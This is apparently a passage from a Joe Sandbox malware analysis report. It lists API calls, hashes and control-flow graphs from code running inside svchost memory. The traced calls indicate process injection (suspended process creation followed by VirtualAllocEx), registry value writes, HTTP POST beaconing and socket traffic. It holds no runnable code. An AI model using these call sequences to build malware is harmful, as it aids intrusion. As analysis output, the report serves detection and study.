                                                                                                                                                                                • Instruction ID: 340928ed9c63ac25230cf3f699ca75f3c2cd4d17112b793a2d8b979986149470
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                • Instruction Fuzzy Hash: A2F0A7B06012A56FCB04AF364EC0C4BAFDCE34935C364A83EF105E2504FB3888858BB0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453EC
                                                                                                                                                                                • PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 131453F7
                                                                                                                                                                                  • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                • PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314540C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Path$AppendBackslashEnvironmentVariablelstrlen
                                                                                                                                                                                • String ID: C:\Windows\system32\regedit.exe$LoadLibraryExA
                                                                                                                                                                                • API String ID: 3711117582-2466685467
                                                                                                                                                                                • Opcode ID: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                • Instruction ID: f2fba57a893278f7b18921d85e771a08421c937711f0f5b5b8013211c7d59eed
                                                                                                                                                                                • Opcode Fuzzy Hash: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 8AE01A76B4122477EA047BA98D4EFDA3A2CDB11B59B440030F902F55C4EB94E54286A9
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 377 4002120-4002131 378 4002137-400213b 377->378 379 400225b-4002261 377->379 378->379 380 4002141-4002145 378->380 380->379 381 400214b-400216c lstrlenA * 2 380->381 382 4002173-4002179 381->382 383 40021b0-40021d3 VirtualAlloc 382->383 384 400217b-4002193 StrStrIA 382->384 383->379 387 40021d9-40021e0 383->387 385 4002195-40021ae 384->385 386 40021ac 384->386 385->382 386->383 389 40021e7-40021ed 387->389 389->379 390 40021ef-4002207 StrStrIA 389->390 391 4002209-4002259 lstrcpynA 390->391 392 400224f 390->392 391->389 392->379
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0400214F
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0400215C
                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,00000000), ref: 04002186
                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 040021C6
                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,00000000), ref: 040021FA
                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 04002229
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.708267706.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$AllocVirtuallstrcpyn
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1165442690-0
                                                                                                                                                                                • Opcode ID: 46478cc78d8ed65e962a0453220b7aab9d4c5308cbe5d96cdd6cddbf7ab7e3a3
                                                                                                                                                                                • Instruction ID: 8e5106bfe710839a6185bbadd48f64f24d95943a02d63ef35a25000e1e6e3557
                                                                                                                                                                                • Opcode Fuzzy Hash: 46478cc78d8ed65e962a0453220b7aab9d4c5308cbe5d96cdd6cddbf7ab7e3a3
                                                                                                                                                                                • Instruction Fuzzy Hash: AF41A470901109EBDB04CFD8C998BEEBBB5FB88309F10C599E915B7284D338AA41CB91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • wsprintfA.USER32 ref: 04001C0A
                                                                                                                                                                                  • Part of subcall function 04002080: QueryPerformanceCounter.KERNEL32(00000000), ref: 04002094
                                                                                                                                                                                  • Part of subcall function 040020B0: QueryPerformanceCounter.KERNEL32(?), ref: 040020E7
                                                                                                                                                                                  • Part of subcall function 040010A0: InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001158
                                                                                                                                                                                  • Part of subcall function 040010A0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 04001173
                                                                                                                                                                                  • Part of subcall function 040010A0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040011AC
                                                                                                                                                                                  • Part of subcall function 040010A0: HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,040030AC,00600100,00000000), ref: 040011EA
                                                                                                                                                                                  • Part of subcall function 040010A0: wnsprintfA.SHLWAPI ref: 04001218
                                                                                                                                                                                  • Part of subcall function 040010A0: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 04001233
                                                                                                                                                                                • Sleep.KERNELBASE(00000000), ref: 04001C60
                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 04001C98
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04001CAE
                                                                                                                                                                                • CoUninitialize.OLE32 ref: 04001CB9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.708267706.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Internet$CounterHttpOpenPerformanceQueryRequestSleep$ConnectCrackFreeHeadersUninitializeVirtualwnsprintfwsprintf
                                                                                                                                                                                • String ID: http://%s/
                                                                                                                                                                                • API String ID: 3410617123-3353559419
                                                                                                                                                                                • Opcode ID: 13d162de3e64c141ef0ae81f3563af103fc5faf5f2605bcaf84b3834cc00689f
                                                                                                                                                                                • Instruction ID: 81a1c40e0812fe05308fe9829dd288aa633f73d773d73b740ab164a7fdf0e2aa
                                                                                                                                                                                • Opcode Fuzzy Hash: 13d162de3e64c141ef0ae81f3563af103fc5faf5f2605bcaf84b3834cc00689f
                                                                                                                                                                                • Instruction Fuzzy Hash: 202145B1E01104ABEB14DB94DC45FEEB775AF58308F1481A5E605BA181E635EA80CF56
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 415 1314ccd7-1314cd02 call 13144fe4 418 1314cd04 415->418 419 1314cd05-1314cd1a Sleep call 13144d0b 418->419 421 1314cd1f-1314cd73 call 13144d0b call 13144ea1 * 2 call 131518cb call 13144eb3 * 2 419->421 421->419 434 1314cd75-1314cd7a 421->434 435 1314cd96-1314cdd2 select call 13144ea1 * 2 434->435 436 1314cd7c-1314cd8c call 1314bd91 434->436 445 1314cec8-1314cedd call 13144d0b 435->445 446 1314cdd8-1314cdde 435->446 441 1314cd90-1314cd94 436->441 442 1314cd8e 436->442 441->435 441->436 442->441 453 1314cee3-1314cef0 445->453 454 1314cfbc-1314cfd3 call 13144eb3 * 2 445->454 446->445 447 1314cde4-1314cdea 446->447 447->445 449 1314cdf0-1314cdfd 447->449 451 1314ce03-1314ce14 __WSAFDIsSet 449->451 452 1314ceb9-1314cec2 449->452 451->452 455 1314ce1a-1314ce26 call 1314be9a 451->455 452->445 452->449 456 1314cef6-1314cef9 453->456 457 1314cfad-1314cfb6 453->457 454->418 455->452 466 1314ce2c-1314ce2f 455->466 456->457 460 1314ceff-1314cf04 456->460 457->453 457->454 463 1314cf06-1314cf14 call 1315185f 460->463 464 1314cf19-1314cf22 460->464 463->457 469 1314cf24-1314cf30 call 1314bbf8 464->469 470 1314cf5b-1314cf77 call 13151be3 call 1314c137 464->470 471 1314ce85-1314ce8b 466->471 472 1314ce31-1314ce35 466->472 481 1314cf32-1314cf3c call 131513cf 469->481 482 1314cf3e-1314cf59 call 1314bd05 GetTickCount 469->482 498 1314cfa3 470->498 499 1314cf79-1314cf8b call 1314c0bc 470->499 471->452 476 1314ce8d-1314ce96 call 1314b1b8 471->476 477 1314ce37-1314ce3e 472->477 478 1314ce40-1314ce43 472->478 476->452 497 1314ce98-1314ce9b 476->497 477->452 485 1314ce65-1314ce68 478->485 486 1314ce45-1314ce4e call 1314c071 478->486 481->463 482->457 488 1314ce79 485->488 489 1314ce6a-1314ce77 485->489 505 1314ce54-1314ce62 call 13144c1f 486->505 506 1314ce50-1314ce52 486->506 495 1314ce7b-1314ce83 call 1314b0d3 488->495 489->495 495->506 497->452 503 1314ce9d-1314cea6 call 1314c071 497->503 501 1314cfa5-1314cfa8 call 13151bd5 498->501 499->501 514 1314cf8d-1314cf9e call 131513cf call 1315185f 499->514 501->457 503->506 515 1314cea8-1314ceb6 call 13144c1f 503->515 505->485 506->452 514->498 515->452
                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNELBASE(00000001), ref: 1314CD07
                                                                                                                                                                                  • Part of subcall function 13144D0B: _memset.LIBCMT ref: 13144D29
                                                                                                                                                                                  • Part of subcall function 13144EA1: EnterCriticalSection.KERNEL32(00000000,1314E2F0,?,00000000,00000000,-00000004), ref: 13144EAC
                                                                                                                                                                                  • Part of subcall function 131518CB: EnterCriticalSection.KERNEL32(03801028,13161EF0,00000000,03801020,03801020,?,1314CD55,?,13161EF0,131616E8), ref: 131518DE
                                                                                                                                                                                  • Part of subcall function 131518CB: LeaveCriticalSection.KERNEL32(03801028,?,1314CD55,?), ref: 131518EB
                                                                                                                                                                                  • Part of subcall function 13144EB3: LeaveCriticalSection.KERNEL32(00000000,1314E30B,?,00000000,00000000,-00000004), ref: 13144EBE
                                                                                                                                                                                • select.WS2_32(00000000,13161EF0,00000000,131616E8,?), ref: 1314CDB0
                                                                                                                                                                                • __WSAFDIsSet.WS2_32(?,13161EF0), ref: 1314CE0D
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$CountSleepTick_memsetselect
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 462285117-0
                                                                                                                                                                                • Opcode ID: bc6f7c878f98143a391d096ed0f0a874d9c00021e8d9e1d7048eb94279f4efec
                                                                                                                                                                                • Instruction ID: 804a398415ae26fc5b7eb0287963a1101ec9206849f780cd4644be78a764b607
                                                                                                                                                                                • Opcode Fuzzy Hash: bc6f7c878f98143a391d096ed0f0a874d9c00021e8d9e1d7048eb94279f4efec
                                                                                                                                                                                • Instruction Fuzzy Hash: 7C819D79800316FFDF11DFA8D98099EBBF9FF05314B25053AE511B3290DB38AA518BA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 13144927
                                                                                                                                                                                • CreateThread.KERNEL32 ref: 13144AA2
                                                                                                                                                                                • Sleep.KERNELBASE(0000000A,?), ref: 13144AF6
                                                                                                                                                                                • Sleep.KERNELBASE(00000032,?,?,?), ref: 13144B15
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep$CreateExitProcessThreadlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 409902211-0
                                                                                                                                                                                • Opcode ID: 79e7f25478e3dcf90d08d694072f9f073b2716a9a12e304b42731dd851f2dc92
                                                                                                                                                                                • Instruction ID: d88f6d14892378904b0dc470ab3adc977061ca48c0c3b786eb947c20e0c2d408
                                                                                                                                                                                • Opcode Fuzzy Hash: 79e7f25478e3dcf90d08d694072f9f073b2716a9a12e304b42731dd851f2dc92
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D710476A80350EFDB25EF59C9C5E5A7BF8EB86755F34002AE501F7244EB38A540CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersion.KERNEL32(00020000,76B5EEA0,00000000), ref: 1314302C
                                                                                                                                                                                • GetCommandLineA.KERNEL32(00000000,0000004A,00000000,0000003C), ref: 13143086
                                                                                                                                                                                • StrStrIA.KERNELBASE(00000000,00000000,0000007B), ref: 131430A7
                                                                                                                                                                                • inet_addr.WS2_32(00000000), ref: 131430D2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CommandLineVersioninet_addr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4064751120-0
                                                                                                                                                                                • Opcode ID: 8c29bf9a9e3164cd00cdf173d5a8084e70e7ccd357447c54fdac7d7a3ea16c70
                                                                                                                                                                                • Instruction ID: 69915f827bd4f4389c55c8526bcd49d3ee977bc70560e42c9cfe2d9561d34fc1
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c29bf9a9e3164cd00cdf173d5a8084e70e7ccd357447c54fdac7d7a3ea16c70
                                                                                                                                                                                • Instruction Fuzzy Hash: 695175B9740354B7D724EBA9CC8DF9A3B29EBC2B59F14083DF105DA1C1EB74A444CA25
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000000,76B5EEA0,131433F1), ref: 131432DF
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000000), ref: 131432F3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalInitializeSection
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 32694325-0
                                                                                                                                                                                • Opcode ID: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                • Instruction ID: 6a4b42ed693ed77350d83cd620794c4273ef5989a6c03f0071cd9a173a3549bc
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                • Instruction Fuzzy Hash: EFF054B5A443316BFF18ABFD6D95B962E9CDB05765F24443BF505D2288EF688000DAA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13144EA1: EnterCriticalSection.KERNEL32(00000000,1314E2F0,?,00000000,00000000,-00000004), ref: 13144EAC
                                                                                                                                                                                  • Part of subcall function 13144EB3: LeaveCriticalSection.KERNEL32(00000000,1314E30B,?,00000000,00000000,-00000004), ref: 13144EBE
                                                                                                                                                                                • Sleep.KERNELBASE(00000001), ref: 131460EF
                                                                                                                                                                                • Sleep.KERNEL32(00000064,-00000004,0000003F,00000000), ref: 1314613E
                                                                                                                                                                                  • Part of subcall function 1315181B: EnterCriticalSection.KERNEL32(03801028,00000000,00000000,76B26490,131461CD,00000000,00000000,000000FF), ref: 13151824
                                                                                                                                                                                  • Part of subcall function 1315181B: LeaveCriticalSection.KERNEL32(03801028), ref: 13151835
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 131461E6
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 131461FF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSectionSleep$EnterLeave
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 890587828-0
                                                                                                                                                                                • Opcode ID: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                • Instruction ID: 08080a18ae1c1e4bd548ce539b053228da539052a701547300ae0ece9703ad5c
                                                                                                                                                                                • Opcode Fuzzy Hash: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                • Instruction Fuzzy Hash: 91312734A00320EFCB15AB68CEA1A6D7265AFC2B3DF380935F542761D5DF756581C660
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,04001B70,00000000,00000000,00000000), ref: 04001B31
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,04001CD0,00000000,00000000,00000000), ref: 04001B4B
                                                                                                                                                                                • Sleep.KERNELBASE(000000FF), ref: 04001B55
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.708267706.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$Sleep
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 422425972-0
                                                                                                                                                                                • Opcode ID: 911a9de0ce48e0813a73cc35970733eea27961472999e7db9f15ae2455a963c9
                                                                                                                                                                                • Instruction ID: eea7b1e711cf4d7e54718b335fda834aed70efeb3a863995a80571137befa406
                                                                                                                                                                                • Opcode Fuzzy Hash: 911a9de0ce48e0813a73cc35970733eea27961472999e7db9f15ae2455a963c9
                                                                                                                                                                                • Instruction Fuzzy Hash: BA41C374A042A4EBFB21CB54CD51BDC77B1AB49309F04C2D5E5887A2C0D2F96BC49F62
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • htons.WS2_32(00000FA0), ref: 131462EC
                                                                                                                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 13146307
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,13143365,00016AF0,LoadLibraryExA,?), ref: 13146316
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLasthtonssocket
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3100113635-0
                                                                                                                                                                                • Opcode ID: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                • Instruction ID: 7cd8044a41f5419db6204b812f03637fabde0fd073de533a2041f97633ced2a2
                                                                                                                                                                                • Opcode Fuzzy Hash: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 42F04CF06103B4BBDB08ABE4CD96BA976A89F0631CF100539E526D52C5E3FC8100D732
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,-00000004,000000EA,00000000,000F003F,131433EC), ref: 1314AD6C
                                                                                                                                                                                  • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                • RegSetValueExA.KERNELBASE(131433EC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314AD91
                                                                                                                                                                                • RegCloseKey.KERNELBASE(131433EC), ref: 1314AD9A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpenValuelstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2964171075-0
                                                                                                                                                                                • Opcode ID: 51ed73a0fe790b9dd92d53e1637baf4121573ec2e986ea361f53db6b8728750e
                                                                                                                                                                                • Instruction ID: 2255bb1203f2d937dd86bd40a46386538b46995e581dfddca6c9809dc99bbe15
                                                                                                                                                                                • Opcode Fuzzy Hash: 51ed73a0fe790b9dd92d53e1637baf4121573ec2e986ea361f53db6b8728750e
                                                                                                                                                                                • Instruction Fuzzy Hash: 01F0DA75740259BBF714EB94CD46FBD777CAB10748F600074E701F61D4E7B4AA049625
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • recv.WS2_32(00080000,00000000,?,00000000), ref: 04002038
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.708267706.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: recv
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1507349165-0
                                                                                                                                                                                • Opcode ID: f6ef40dd27d3f64aa4c7ad3445c2614c9883f47684c4cbc294a518e6a5bd2b4f
                                                                                                                                                                                • Instruction ID: 1490ad3c8c487522ec69c99126d549fb18974fc2434ebf29d7f8fdb6e7a3af40
                                                                                                                                                                                • Opcode Fuzzy Hash: f6ef40dd27d3f64aa4c7ad3445c2614c9883f47684c4cbc294a518e6a5bd2b4f
                                                                                                                                                                                • Instruction Fuzzy Hash: 8F11E274904309EFEF54CEA8C5487AE77B8BB04304F10C59DE80567282D775AAA9EB52
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • send.WS2_32(?,00000000,?,00000000), ref: 04001FD4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.708267706.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: send
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2809346765-0
                                                                                                                                                                                • Opcode ID: 2100ac8d9ccfc1c3ea6572966c3e8a8bfe3d9605e9b65afa06b98ac370825bd3
                                                                                                                                                                                • Instruction ID: ddc634f8a748a6d409fac8990d55453b89dec0a0c339fcac8bf16607cd560618
                                                                                                                                                                                • Opcode Fuzzy Hash: 2100ac8d9ccfc1c3ea6572966c3e8a8bfe3d9605e9b65afa06b98ac370825bd3
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B01FB3490830DEBEF54CFA8C884BFE77B4AF04315F108698E8156B2C0D776A655EB51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0400104C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.708267706.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InternetOpen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2038078732-0
                                                                                                                                                                                • Opcode ID: b84c2f3ab8dffe545ce637dc70d95fb5ca9e611fe81d9fbe675e144515fb097f
                                                                                                                                                                                • Instruction ID: 09348433bfd61fea3343c454be9addcc65c86f6fb96e00209f97bf9dceae6fcc
                                                                                                                                                                                • Opcode Fuzzy Hash: b84c2f3ab8dffe545ce637dc70d95fb5ca9e611fe81d9fbe675e144515fb097f
                                                                                                                                                                                • Instruction Fuzzy Hash: D0E0EC71140708BBE7108F50DC4AB893B949700759F10C424BA086A1C0C2FDA9C48F84
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 131453CC: GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453EC
                                                                                                                                                                                  • Part of subcall function 131453CC: PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 131453F7
                                                                                                                                                                                  • Part of subcall function 131453CC: PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314540C
                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314333E,00016AF0,LoadLibraryExA,?), ref: 1314542F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Path$AppendBackslashCreateEnvironmentFileVariable
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2777513326-0
                                                                                                                                                                                • Opcode ID: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                • Instruction ID: 66e39ae68a4ad776ab8cf99ca3730a67aa31f6f4521c04cb6f79f5c4211117d6
                                                                                                                                                                                • Opcode Fuzzy Hash: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                • Instruction Fuzzy Hash: 56C048B9B61312BAFE2D1B319D5FF2B160C9710A02F28566CB202E9880BAD4A9108420
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCommandLineA.KERNEL32(?,?,?,76B7EA30,00000000,00000000), ref: 1314525F
                                                                                                                                                                                • StrStrA.SHLWAPI(00000001,131413B4,?,?,?,76B7EA30,00000000,00000000), ref: 13145273
                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,1315CA60,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 131452AE
                                                                                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,1314DFE7,00003000,00000040,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000), ref: 131452CC
